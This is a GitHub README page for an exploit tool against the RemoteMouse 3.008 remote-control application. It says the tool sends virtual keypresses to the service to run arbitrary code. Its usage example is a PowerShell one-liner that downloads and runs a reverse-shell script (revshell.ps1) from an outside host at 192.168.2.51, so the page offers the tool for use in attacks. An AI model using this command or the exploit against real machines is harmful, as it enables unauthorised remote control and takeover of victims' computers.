Skip to content

Latest commit

 

History

History
27 lines (18 loc) · 1.31 KB

README.md

File metadata and controls

27 lines (18 loc) · 1.31 KB

RemoteMouse-3.008-Exploit

GitHub release (latest by date) YouTube Channel Subscribers

The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.

Video Proof of Concept

poc.mp4

Usage

./RemoteMouse-3.008-Exploit.py --target-ip --cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

References